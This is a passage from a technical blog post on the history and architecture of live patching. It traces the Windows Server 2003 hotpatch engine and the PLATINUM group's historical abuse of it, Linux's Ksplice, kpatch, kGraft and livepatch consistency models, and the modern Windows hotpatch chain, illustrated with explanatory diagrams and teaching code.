&lt;li&gt;&lt;strong&gt;No consistency model.&lt;/strong&gt; The prologue overwrite was atomic at the instruction level, but the design said nothing about a thread that was already executing the function body. If an in-flight call could finish in the old code while a new call into the same function landed in the new code, certain bug fixes that changed semantics across the call were unsound. The 2003 engine handled the easy cases and trusted the patch author for the rest.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No architectural trust anchor.&lt;/strong&gt; Any kernel-mode code with permission to call &lt;code&gt;NtSetSystemInformation(SystemHotpatchInformation)&lt;/code&gt; could install a &quot;hot patch.&quot; Driver signing [@ms-pe-format] and &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt; were the only line of defense, and Microsoft would discover ten years later that they were not enough.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No servicing-model integration.&lt;/strong&gt; Hot patches were ad-hoc per-advisory artifacts. There was no quarterly baseline, no hotpatch-month cadence, no servicing-stack-level expectation that a customer would receive a hot patch instead of a reboot. Operations teams had to opt into each one.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Limited content coverage.&lt;/strong&gt; Function-body replacement only. No struct-layout migration, no driver-version transitions in the boot path, no ELAM. The pool of advisories that &lt;em&gt;could&lt;/em&gt; ship as a &lt;code&gt;.hotp1&lt;/code&gt; was small.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The fourth failure -- the one Microsoft discovered the hard way -- is the subject of the next section.&lt;/p&gt;
&lt;h2&gt;3. Why the 2003 pipeline failed: politics, operations, and PLATINUM&lt;/h2&gt;
&lt;p&gt;In April 2016, Microsoft Threat Intelligence published a report on a state-aligned APT group it tracked as PLATINUM. The mainstream coverage of that report [@thehackernews-platinum] named the group&apos;s activity as dating to 2009 and described its tradecraft: PLATINUM was abusing the same &lt;code&gt;NtSetSystemInformation(SystemHotpatchInformation)&lt;/code&gt; interface Microsoft itself had shipped, to inject backdoors named Dipsing, Adbupd, and JPIN into &lt;code&gt;winlogon.exe&lt;/code&gt;, &lt;code&gt;lsass.exe&lt;/code&gt;, and &lt;code&gt;svchost.exe&lt;/code&gt;. Microsoft&apos;s own MMPC blog said of the hot-patch tradecraft itself, preserved verbatim on the Wayback Machine [@ms-mmpc-platinum-2016-wayback]: &quot;Using hotpatching in the malicious context has been theorized, but has not been observed in the wild before.&quot; The April 2016 disclosure was the &lt;em&gt;first&lt;/em&gt; in-the-wild observation. The exact start date for PLATINUM&apos;s use of the technique is not in the public record; what is in the record is that the mechanism Microsoft had introduced as a customer feature had quietly become a detection-evasion technique by the time Microsoft caught it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PLATINUM&apos;s tradecraft was structurally identical to the 2003 hot-patch engine&apos;s design. The group obtained the &lt;code&gt;SeDebugPrivilege&lt;/code&gt;-equivalent privileges that the documented &lt;code&gt;NtSetSystemInformation(SystemHotpatchInformation)&lt;/code&gt; call required, then used the same syscall path Microsoft had documented for legitimate hot patching [@thehackernews-platinum] to inject code into long-running system processes. Microsoft&apos;s MMPC blog framed this as the first in-the-wild observation of the technique, not as evidence of a long-running campaign with a known start date. The point is not that the syscall was a backdoor. The point is that hot patching, as designed in 2003, had no trust anchor architecturally distinct from the kernel that performed the patch. &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt; validated the binary on disk; nothing validated the in-memory operation. Once an attacker reached kernel mode, the patch path was just another tool.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s original PLATINUM writeup lived at &lt;code&gt;blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/&lt;/code&gt;. That URL has not survived the multiple Microsoft CMS migrations between 2016 and 2026. The Hacker News&apos;s contemporaneous coverage [@thehackernews-platinum] preserves the load-bearing details: target processes, backdoor names, the 2009 first-observation date, and the &lt;code&gt;NtSetSystemInformation&lt;/code&gt; abuse pattern.&lt;/p&gt;
&lt;p&gt;In retrospect Microsoft drew a two-part lesson, visible in the structure of the modern design. First: in-memory code mutation is necessary if you want to live-patch a fleet at any reasonable scale, because reboots are too expensive and operationally too political to schedule monthly. Second: in-memory code mutation cannot ship safely without an architectural trust anchor distinct from the kernel code being mutated, and it cannot ship operationally without a delivery system that constrains &lt;em&gt;what&lt;/em&gt; mutations are allowed. The Server 2003 engine had the first half. It had nothing resembling the second half.&lt;/p&gt;
&lt;p&gt;Both halves of that lesson took 17 years to be ready. Hardware-mediated isolation under Virtualization-Based Security (VBS) shipped in Windows 10 in 2015; &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt; (the Hypervisor-protected Code Integrity component) and &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;the Secure Kernel&lt;/a&gt; matured through subsequent releases; and the cumulative-update servicing model [@wikipedia-windows-update] that replaced the GDR/QFE branch split arrived with Windows 10 and was back-ported to Windows 7 and 8.1 in October 2016 [@wikipedia-windows-update]. Each of those preconditions had to be standard before a successor hot-patch design could exist.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The mechanism of hot patching is older than the product. Microsoft did not invent in-memory function replacement on Windows in 2022. It &lt;em&gt;shipped&lt;/em&gt; it in 2003, watched it fail operationally, and then discovered in April 2016 that PLATINUM, a group active since 2009, had been weaponizing the same primitive. The work that took 17 years was not the binary rewriting. It was the trust anchor, the servicing discipline, and the management plane that would make rewriting a fleet&apos;s &lt;code&gt;.text&lt;/code&gt; safe to operate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;While Microsoft&apos;s 2003 attempt was atrophying in the field, an MIT graduate student named Jeff Arnold was about to publish what would become the canonical academic treatment of the same problem -- and the Linux community was about to spend a decade and a half working through every consistency-model variant a function-replacement system can have. The Linux side of the story is the next four sections in compressed form.&lt;/p&gt;
&lt;h2&gt;4. Linux takes the wheel: Ksplice, kpatch and kGraft, mainline livepatch&lt;/h2&gt;
&lt;p&gt;In June 2008, Jeff Arnold submitted his MIT Master of Engineering thesis. The cover page names him and his supervisor, M. Frans Kaashoek, only [@arnold-mit-thesis-2008]. The thesis&apos;s claim, presented as a measurement rather than a hope: 42 of 50 (84%) of all significant x86-32 Linux security patches from May 2005 to December 2007 could be applied to a running kernel by Ksplice without a human writing new code. The patches were applied by treating the source diff as a binary diff and lifting the object-level differences onto the running kernel under &lt;code&gt;stop_machine()&lt;/code&gt; quiescence.The Ksplice EuroSys 2009 paper has &lt;em&gt;exactly two&lt;/em&gt; authors: Jeff Arnold and M. Frans Kaashoek, both at MIT. The DSpace record at MIT names them verbatim; the PDF title page does the same [@arnold-eurosys-2009-pdf]. Web search engines have occasionally produced five- and six-author lists for this paper. Those are hallucinations. The thesis-to-paper extension at EuroSys is two authors. The Ksplice startup later employed more engineers; the academic record does not.&lt;/p&gt;
&lt;p&gt;Ten months after the thesis, in April 2009, Arnold and Kaashoek&apos;s EuroSys paper tightened the headline number [@arnold-eurosys-2009-dspace]: 56 of 64 patches from May 2005 to May 2008, or 88% of significant x86-32 Linux kernel security patches, applied with no new code. That number became the founding empirical claim of the entire field. Every live-patcher built since has been measured against it.&lt;/p&gt;
&lt;p&gt;Then the field stalled. Oracle acquired Ksplice on July 21, 2011 [@wikipedia-ksplice], pulled Red Hat support, and made the technology Oracle Linux Premier Support customers only [@mit-ksplice-page]. For three years, Linux had no community-shipped live patcher.&lt;/p&gt;

timeline
    title Live-patching, 1996 to 2026
    1996-1999 : MSVC /hotpatch ships
    2005      : Server 2003 SP1 hotpatch engine
    2008-2009 : Ksplice (Arnold and Kaashoek)
    2011      : Oracle acquires Ksplice
    2014      : kGraft (SUSE) and kpatch (Red Hat)
    2015      : Linux 4.0 merges in-tree livepatch
    2016+     : Hybrid consistency model lands
    2016+     : VBS and HVCI mature in Windows 10
    2018-2021 : Microsoft Azure host fleet on internal hot patch
    Feb 2022  : Server 2022 Azure Edition public GA
    Apr 2025  : Win11 Enterprise 24H2 client GA
    Jul 2025  : Server 2025 over Arc at \$1.50/core/month
&lt;p&gt;Two timeline brackets are editorial inferences worth flagging explicitly. The &lt;strong&gt;1996-1999 MSVC &lt;code&gt;/hotpatch&lt;/code&gt;&lt;/strong&gt; row uses the MSVC 6.0 / 7.x toolchain window as the introduction range; the MSVC compiler reference [@ms-cpp-hotpatch] documents current behavior but does not state the original ship year. The &lt;strong&gt;2018-2021 Microsoft Azure host fleet on internal hot patch&lt;/strong&gt; row brackets the &quot;for years&quot; framing in the November 2021 Windows OS Platform team blog [@ms-techcommunity-hotpatch-nov2021], which is the load-bearing primary attestation that the engine was internal-Azure for years before the February 2022 GA. Both brackets are editorial; the surrounding text and citations carry the unambiguous dates (1996+ for MSVC, 2022 GA for the public product).&lt;/p&gt;
&lt;p&gt;The stall ended in early 2014 with two near-simultaneous re-attempts at the same problem. SUSE&apos;s Jiri Kosina and Jiri Slaby published kGraft on February 3, 2014 [@lwn-kgraft-584016], as a 600-line patch that built on the kernel&apos;s existing ftrace infrastructure plus a per-task &quot;two universe&quot; model, with switchover at kernel-exit. SUSE presented kGraft at the Linux Foundation Collaboration Summit on March 27, 2014 [@collabsummit-2014-sched], and issued a press release crediting SUSE Labs as the origin [@suse-kgraft-pressrelease]. Red Hat&apos;s kpatch project had announced publicly on February 26, 2014 [@wikipedia-kpatch]; on May 1, 2014, Josh Poimboeuf sent the kpatch RFC to LKML [@lwn-kpatch-597123], with Seth Jennings co-named on the development team. Red Hat published Poimboeuf&apos;s introductory blog [@redhat-kpatch-blog] describing kpatch&apos;s four components: a build tool, a per-fix hot-patch module, the kpatch core module that hooked ftrace, and a userspace utility.&lt;/p&gt;

Linux&apos;s in-kernel function tracer. ftrace works by reserving a small region of NOP space at the start of every traceable kernel function (the `mcount` reservation, similar in spirit to MSVC&apos;s `/hotpatch` prologue but separately implemented), then rewriting that NOP region at runtime to call a tracer or, in the live-patch case, to call a replacement function. Both kpatch and kGraft layered live patching on top of ftrace because ftrace had already solved the safe-rewriting problem in the kernel; the live-patcher&apos;s job was reduced to &quot;redirect this function&quot; rather than &quot;rewrite this code.&quot; The choice of ftrace is the single biggest mechanical difference between Linux live patching and Windows hot patching.
&lt;p&gt;The two designs differed at exactly one place: the consistency model. Kpatch chose stop_machine plus a backtrace check [@lwn-kpatch-597407] -- &quot;a sledgehammer,&quot; in LWN&apos;s contemporaneous phrase, that halted every CPU and walked every task&apos;s stack to verify the old code was not in flight before swapping it for the new. kGraft chose a per-task flag and a lazy migration at kernel-exit [@lwn-kgraft-596854] -- elegant in concept, but with an unbounded transition tail for tasks that never crossed back into user mode. Kpatch could not patch always-on-stack functions like &lt;code&gt;schedule()&lt;/code&gt;, &lt;code&gt;do_wait()&lt;/code&gt;, or &lt;code&gt;irq_thread()&lt;/code&gt;; LWN estimated a few dozen such functions in a typical kernel [@lwn-kpatch-597407]. kGraft could in principle patch anything but might never finish converging.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;System&lt;/th&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Consistency model&lt;/th&gt;
&lt;th&gt;Trust anchor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Gen 0&lt;/td&gt;
&lt;td&gt;2005&lt;/td&gt;
&lt;td&gt;Server 2003 SP1 hotpatch&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/hotpatch&lt;/code&gt; prologue + &lt;code&gt;.hotp1&lt;/code&gt; PE section&lt;/td&gt;
&lt;td&gt;Atomic prologue swap, no in-flight story&lt;/td&gt;
&lt;td&gt;Authenticode + driver signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 1&lt;/td&gt;
&lt;td&gt;2008 to 2011&lt;/td&gt;
&lt;td&gt;Ksplice (MIT, then Oracle)&lt;/td&gt;
&lt;td&gt;Object-code diff, &lt;code&gt;stop_machine&lt;/code&gt; quiescence&lt;/td&gt;
&lt;td&gt;Global pause, stack check&lt;/td&gt;
&lt;td&gt;Out-of-tree kernel module, GPLv2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 2a&lt;/td&gt;
&lt;td&gt;2014&lt;/td&gt;
&lt;td&gt;kpatch (Red Hat)&lt;/td&gt;
&lt;td&gt;ftrace-based fentry trampoline&lt;/td&gt;
&lt;td&gt;&lt;code&gt;stop_machine&lt;/code&gt; plus per-task backtrace check&lt;/td&gt;
&lt;td&gt;Module signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 2b&lt;/td&gt;
&lt;td&gt;2014&lt;/td&gt;
&lt;td&gt;kGraft (SUSE)&lt;/td&gt;
&lt;td&gt;ftrace plus INT3/IPI-NMI rewriting&lt;/td&gt;
&lt;td&gt;Per-task flag, kernel-exit migration&lt;/td&gt;
&lt;td&gt;Module signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 3&lt;/td&gt;
&lt;td&gt;Apr 2015&lt;/td&gt;
&lt;td&gt;Mainline &lt;code&gt;livepatch&lt;/code&gt; v1&lt;/td&gt;
&lt;td&gt;ftrace-based common substrate&lt;/td&gt;
&lt;td&gt;Deferred -- both front-ends survive&lt;/td&gt;
&lt;td&gt;In-tree module signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 4&lt;/td&gt;
&lt;td&gt;2016+&lt;/td&gt;
&lt;td&gt;Mainline &lt;code&gt;livepatch&lt;/code&gt; hybrid&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;td&gt;kGraft per-task plus kpatch stack-check plus kernel-exit plus idle-loop&lt;/td&gt;
&lt;td&gt;In-tree module signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 5&lt;/td&gt;
&lt;td&gt;2018 to 2021&lt;/td&gt;
&lt;td&gt;Microsoft Azure internal hot patch&lt;/td&gt;
&lt;td&gt;HPAT plus IMAGE_HOT_PATCH_BASE plus VSM&lt;/td&gt;
&lt;td&gt;Per-process callback, no global pause&lt;/td&gt;
&lt;td&gt;Secure Kernel under HVCI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 6&lt;/td&gt;
&lt;td&gt;2022, 2025&lt;/td&gt;
&lt;td&gt;Windows Modern Hotpatch (three product waves)&lt;/td&gt;
&lt;td&gt;Same as Gen 5&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Two near-equivalent re-attempts, one tree-shaped politics problem: only one design could be merged. LWN&apos;s coverage of the contest [@lwn-kpatch-597407] is now the canonical retrospective. The compromise came in Linux 4.0, released April 12, 2015 [@kernelnewbies-linux-4-0]: merge the ftrace-based common core, defer the consistency-model question. Both kpatch and kGraft survived as out-of-tree front-ends on top of the in-tree core.&lt;/p&gt;
&lt;p&gt;A year later, Josh Poimboeuf landed the hybrid consistency model [@lwn-livepatch-consistency-634649] that the in-tree v1 had postponed. The result is what the kernel.org documentation today calls [@kernel-livepatch-doc], in three converged paragraphs of formerly contested design:&lt;/p&gt;

Livepatch has a consistency model which is a hybrid of kGraft and kpatch: it uses kGraft&apos;s per-task consistency and syscall barrier switching combined with kpatch&apos;s stack trace switching. -- `Documentation/livepatch/livepatch.rst`, kernel.org [@kernel-livepatch-doc]
&lt;p&gt;The hybrid uses three convergence approaches in sequence: walk every task&apos;s stack at a quiescent point (kpatch&apos;s stack-check), transition any remaining tasks lazily at kernel-exit (kGraft&apos;s per-task), and finally handle idle &quot;swapper&quot; tasks and forked tasks with separate convergence rules. The architecture is gated on &lt;code&gt;HAVE_RELIABLE_STACKTRACE&lt;/code&gt; [@kernel-livepatch-doc], which is itself a non-trivial per-architecture invariant.&lt;/p&gt;
&lt;p&gt;{`
// Toy simulator of the hybrid livepatch consistency model.
// Each task is in one universe (0 = old, 1 = new). The transition
// finishes when every task has migrated.&lt;/p&gt;
&lt;p&gt;function simulate({ nTasks = 100, perTickKernelExit = 0.20, stackCheckPass = 0.60 }) {
  const tasks = Array.from({ length: nTasks }, () =&amp;gt; ({ universe: 0, blocked: false }));
  let tick = 0;
  let converged = 0;&lt;/p&gt;
&lt;p&gt;  // Phase 1: stack check (kpatch). Migrate every task whose stack does NOT contain
  // a patched function. We model this as a per-task pass probability.
  for (const t of tasks) {
    if (Math.random() &amp;lt; stackCheckPass) {
      t.universe = 1;
      converged++;
    }
  }&lt;/p&gt;
&lt;p&gt;  // Phase 2: per-task kernel-exit (kGraft). Each tick, a fraction of remaining
  // tasks transition the next time they cross from kernel to user mode.
  while (converged &amp;lt; nTasks &amp;amp;&amp;amp; tick &amp;lt; 1000) {
    tick++;
    for (const t of tasks) {
      if (t.universe === 0 &amp;amp;&amp;amp; Math.random() &amp;lt; perTickKernelExit) {
        t.universe = 1;
        converged++;
      }
    }
  }&lt;/p&gt;
&lt;p&gt;  return { tick, converged, total: nTasks };
}&lt;/p&gt;
&lt;p&gt;const r = simulate({ nTasks: 100, perTickKernelExit: 0.20, stackCheckPass: 0.60 });
console.log(&apos;Converged &apos; + r.converged + &apos;/&apos; + r.total + &apos; tasks in &apos; + r.tick + &apos; ticks&apos;);
console.log(&apos;Phase 1 (stack check) caught ~60 percent; phase 2 (kernel-exit) caught the rest.&apos;);
`}&lt;/p&gt;
&lt;p&gt;The key insight from this decade and a half of Linux engineering, stated as an empirical observation that has not been overturned: function-level live patching is tractable if and only if you accept that struct-layout changes still require a reboot. Every Linux generation between 2008 and 2026 confirms this rule. Ksplice&apos;s 88% [@arnold-eurosys-2009-dspace] is precisely the fraction of patches that happen to leave data structures alone.&lt;/p&gt;
&lt;p&gt;While the Linux community was building the hybrid, Microsoft was watching from inside Azure -- and was rebuilding hot patching from scratch on a different foundation.&lt;/p&gt;
&lt;h2&gt;5. The modern mechanism: HPAT, IMAGE_HOT_PATCH_BASE, NtManageHotPatch, and the Secure Kernel&lt;/h2&gt;
&lt;p&gt;On November 19, 2021, the Windows OS Platform blog published a piece called &quot;Hotpatching on Windows&quot; [@ms-techcommunity-hotpatch-nov2021]. Buried in the second paragraph is the load-bearing sentence: &lt;em&gt;&quot;The hotpatch engine requires the Secure Kernel to be running.&quot;&lt;/em&gt; That single requirement is the architectural pivot. It is what separates the modern pipeline from the 2003 original, from Ksplice, and from every Linux livepatch design built before or since. It is also the answer to the trust-anchor failure that PLATINUM exploited.&lt;/p&gt;
&lt;p&gt;Walk the chain of structures, in the order the kernel walks them. There are six steps.&lt;/p&gt;
&lt;h3&gt;5.1. Compile time: hot-patch metadata into every patchable PE&lt;/h3&gt;
&lt;p&gt;The target binary is built with hot-patch metadata. The eligible scope, according to the November 2021 blog [@ms-techcommunity-hotpatch-nov2021], covers user-mode DLLs and EXEs, kernel-mode drivers, &lt;a href=&quot;https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/&quot; rel=&quot;noopener&quot;&gt;the hypervisor&lt;/a&gt;, and the Secure Kernel itself. Modern Microsoft compiler toolchains lay the metadata into a structured table inside the binary; the published reference is the PE optional header&apos;s load-config directory.&lt;/p&gt;

A structure pointed to by the optional header of every modern PE32+ image (`IMAGE_LOAD_CONFIG_DIRECTORY64`). The directory carries security-and-loading configuration that the kernel needs before user-mode code starts running: cookie offsets, CFG and CET metadata, SafeSEH tables, and so on. Microsoft&apos;s reference [@ms-image-load-config64] lists `DWORD HotPatchTableOffset;` as a member of this directory in modern Windows SDKs. That single 32-bit RVA is the entry point to every other hot-patch structure described in this section.
&lt;h3&gt;5.2. Image metadata: the IMAGE_HOT_PATCH_INFO and IMAGE_HOT_PATCH_BASE chain&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;HotPatchTableOffset&lt;/code&gt; points at an &lt;code&gt;IMAGE_HOT_PATCH_INFO&lt;/code&gt; structure. The Microsoft Rust bindings [@ms-rs-image-hot-patch-info] document its fields verbatim: &lt;code&gt;Version&lt;/code&gt;, &lt;code&gt;Size&lt;/code&gt;, &lt;code&gt;SequenceNumber&lt;/code&gt;, &lt;code&gt;BaseImageList&lt;/code&gt;, &lt;code&gt;BaseImageCount&lt;/code&gt;, &lt;code&gt;BufferOffset&lt;/code&gt;, &lt;code&gt;ExtraPatchSize&lt;/code&gt;. The &lt;code&gt;BaseImageList&lt;/code&gt; is itself an RVA into one or more &lt;code&gt;IMAGE_HOT_PATCH_BASE&lt;/code&gt; records, with fields [@ms-rs-image-hot-patch-base] &lt;code&gt;SequenceNumber&lt;/code&gt;, &lt;code&gt;Flags&lt;/code&gt;, &lt;code&gt;OriginalTimeDateStamp&lt;/code&gt;, &lt;code&gt;OriginalCheckSum&lt;/code&gt;, &lt;code&gt;CodeIntegrityInfo&lt;/code&gt;, &lt;code&gt;CodeIntegritySize&lt;/code&gt;, &lt;code&gt;PatchTable&lt;/code&gt;, and &lt;code&gt;BufferOffset&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The two fields that are doing the real work, semantically, are &lt;code&gt;OriginalTimeDateStamp&lt;/code&gt; and &lt;code&gt;OriginalCheckSum&lt;/code&gt;. They name the exact base image to which the patch binds. The HPAT proper -- the Hot Patch Address Table reachable from the &lt;code&gt;PatchTable&lt;/code&gt; field -- enumerates each patchable site inside the base image: where the prologue lives, what bytes go there, and how to redirect to the replacement function body.&lt;/p&gt;

The patch-site table reachable from `IMAGE_HOT_PATCH_BASE.PatchTable`. The HPAT enumerates every individual function-level patch site that a hot patch wants to install in the base image: source RVA, target RVA, byte counts, and any per-site flags the patch engine needs. The Signal Labs reverse-engineering writeup [@signal-labs-hotpatching] documents the table&apos;s structure and the kernel&apos;s expectations for it as observed in Windows 11 builds.

flowchart TD
    A[PE optional header] --&amp;gt; B[&quot;IMAGE_LOAD_CONFIG_DIRECTORY64&quot;]
    B --&amp;gt; C[&quot;HotPatchTableOffset (RVA)&quot;]
    C --&amp;gt; D[&quot;IMAGE_HOT_PATCH_INFO\nVersion / Size / SequenceNumber\nBaseImageList / BaseImageCount&quot;]
    D --&amp;gt; E[&quot;IMAGE_HOT_PATCH_BASE\nOriginalTimeDateStamp\nOriginalCheckSum\nCodeIntegrityInfo / Size\nPatchTable&quot;]
    E --&amp;gt; F[&quot;HPAT entries\nper-function patch sites&quot;]
    F --&amp;gt; G[&quot;Replacement function bodies\n(in the patch PE)&quot;]
&lt;h3&gt;5.3. Patch payload: a separate signed PE32+&lt;/h3&gt;
&lt;p&gt;Each hot patch ships as a separate signed PE32+ image [@signal-labs-hotpatching]. The patch image&apos;s own &lt;code&gt;IMAGE_HOT_PATCH_BASE.OriginalTimeDateStamp&lt;/code&gt; and &lt;code&gt;OriginalCheckSum&lt;/code&gt; must match the base image&apos;s load-time fields exactly. The kernel refuses to apply a hot patch whose binding metadata does not match the running base. This is the binding rule that prevents a hot patch produced for &lt;code&gt;kernel32.dll&lt;/code&gt; build N from accidentally landing on build N+1.&lt;/p&gt;
&lt;p&gt;The patch PE may export a special function &lt;code&gt;__PatchMainCallout__&lt;/code&gt;. If present, it is invoked automatically after the patch is loaded in each process [@signal-labs-hotpatching] as a per-process initialization hook -- a hot-patch equivalent of a DLL&apos;s &lt;code&gt;DllMain&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;5.4. NtManageHotPatch: the dedicated syscall&lt;/h3&gt;
&lt;p&gt;The 2003 design overloaded &lt;code&gt;NtSetSystemInformation(SystemHotpatchInformation)&lt;/code&gt;. The modern design has its own syscall. The ntdoc reference [@ntdoc-ntmanagehotpatch] records the signature verbatim:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;NTSTATUS NtManageHotPatch(
    _In_      HOT_PATCH_INFORMATION_CLASS HotPatchInformationClass,
    _Out_writes_bytes_opt_(HotPatchInformationLength) PVOID HotPatchInformation,
    _In_      ULONG HotPatchInformationLength,
    _Out_opt_ PULONG ReturnLength
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The same reference notes the syscall&apos;s &lt;code&gt;PHNT_VERSION &amp;gt;= PHNT_WINDOWS_11&lt;/code&gt; [@ntdoc-ntmanagehotpatch] availability gate, which corresponds operationally to Windows 11 and Windows Server 2022 and later. The call dispatches on &lt;code&gt;HotPatchInformationClass&lt;/code&gt; in the style of &lt;code&gt;NtQuerySystemInformation&lt;/code&gt;, with separate operations to create, activate, map, and list patches.&lt;/p&gt;

The dedicated NT syscall through which hot patches are managed. Class-dispatched on `HOT_PATCH_INFORMATION_CLASS`, with operations including patch creation, activation, mapping into target processes, and enumeration of currently active patches. Introduced in the Windows 11 / Server 2022 family [@ntdoc-ntmanagehotpatch]. Unlike the 2003 design, this syscall is the *only* documented entry point to hot patching, which means EDR vendors can instrument it as a discrete operation rather than guessing from `NtSetSystemInformation` parameter blocks.
&lt;h3&gt;5.5. Trust anchor: the Secure Kernel under HVCI&lt;/h3&gt;
&lt;p&gt;The pivotal architectural difference. Per the Windows OS Platform team&apos;s November 2021 blog [@ms-techcommunity-hotpatch-nov2021]: the Secure Kernel mediates patch validation and the actual &lt;code&gt;.text&lt;/code&gt; rewrite. The Secure Kernel is the kernel-side counterpart to &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;the Isolated User Mode (IUM) trustlet world&lt;/a&gt;, running in Virtual Trust Level 1 (VTL1) under VBS, with HVCI enforcing the invariant that executable code pages must be signed by an entity the normal kernel trusts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; HVCI&apos;s bedrock invariant is that no code page becomes executable unless it was signed by Microsoft (or a trust chain Microsoft endorses) at attestation time. A hot patch rewrites &lt;code&gt;.text&lt;/code&gt;. Naively, that breaks the invariant. The architectural escape is that the &lt;em&gt;new&lt;/em&gt; &lt;code&gt;.text&lt;/code&gt; came from a signed PE whose signature chains to Microsoft -- and that signature is verified by the Secure Kernel, in VTL1, before the rewrite happens. The normal kernel cannot bypass that verification, because the normal kernel does not perform the rewrite. The Secure Kernel does. This is the structural advance over both Microsoft&apos;s 2003 self and over Linux livepatch -- where the same kernel both verifies module signatures and applies the patch. Trust comes from the verifier being architecturally distinct from the verified.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;5.6. Per-process rollout: ntdll callback and PatchMainCallout&lt;/h3&gt;
&lt;p&gt;No global stop-the-world. The kernel enumerates running processes and calls a notification callback inside &lt;code&gt;ntdll.dll&lt;/code&gt; [@signal-labs-hotpatching] in each process, which re-maps the patched code from a kernel-curated view into the process&apos;s address space. If the patch PE exports &lt;code&gt;__PatchMainCallout__&lt;/code&gt;, that function runs in each process immediately after the patch lands. The per-process model means the patch transition is asynchronous and decentralized; there is no equivalent of Linux&apos;s &lt;code&gt;stop_machine()&lt;/code&gt; quiescence, and no equivalent of kGraft&apos;s per-task universe flag. The cost is a more complex security boundary -- the Signal Labs analysis observes that a process can attempt to load a hot patch repeatedly with a payload that fails validation [@signal-labs-hotpatching], producing a denial-of-service vector against specific target processes if administrative privileges have been compromised.&lt;/p&gt;

sequenceDiagram
    actor Admin as Administrator
    participant UM as User-mode caller
    participant NK as Normal kernel
    participant SK as Secure Kernel (VTL1)
    participant Proc as Each running process
    participant NTDLL as ntdll.dll per process&lt;pre&gt;&lt;code&gt;Admin-&amp;gt;&amp;gt;UM: Initiate patch install
UM-&amp;gt;&amp;gt;NK: NtManageHotPatch(class=Activate)
NK-&amp;gt;&amp;gt;SK: Forward patch PE for validation
SK-&amp;gt;&amp;gt;SK: Verify signature, OriginalTimeDateStamp,\nOriginalCheckSum, code-integrity hash
SK-&amp;gt;&amp;gt;SK: Walk HPAT, rewrite .text under HVCI
SK--&amp;gt;&amp;gt;NK: SUCCESS
NK-&amp;gt;&amp;gt;Proc: Walk processes that mapped the base image
NK-&amp;gt;&amp;gt;NTDLL: Invoke per-process notification callback
NTDLL-&amp;gt;&amp;gt;NTDLL: Re-map patched code into address space
alt Patch exports __PatchMainCallout__
    NTDLL-&amp;gt;&amp;gt;Proc: Invoke __PatchMainCallout__()
end
NTDLL--&amp;gt;&amp;gt;NK: Per-process completion
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Walking the HPAT chain in code&lt;/h3&gt;
&lt;p&gt;The chain from optional header to per-function patch site is small enough to walk by hand. The block below is a teaching skeleton: it does not execute against a real PE binary; it shows the field-by-field traversal that a kernel-side validator performs every time &lt;code&gt;NtManageHotPatch(Activate)&lt;/code&gt; is called.&lt;/p&gt;
&lt;p&gt;{`
// Teaching skeleton. The shapes match the public Microsoft documentation
// (ms-image-load-config64, ms-rs-image-hot-patch-info, ms-rs-image-hot-patch-base).
// The structures are populated with placeholder values; a real kernel-side
// validator reads bytes from the on-disk PE and the in-memory image.&lt;/p&gt;
&lt;p&gt;function walkPatchChain(peImage) {
  const optionalHeader = peImage.optionalHeader;
  const loadConfig     = peImage.read(optionalHeader.loadConfigRVA, &apos;IMAGE_LOAD_CONFIG_DIRECTORY64&apos;);
  const hpatTableRVA   = loadConfig.HotPatchTableOffset;
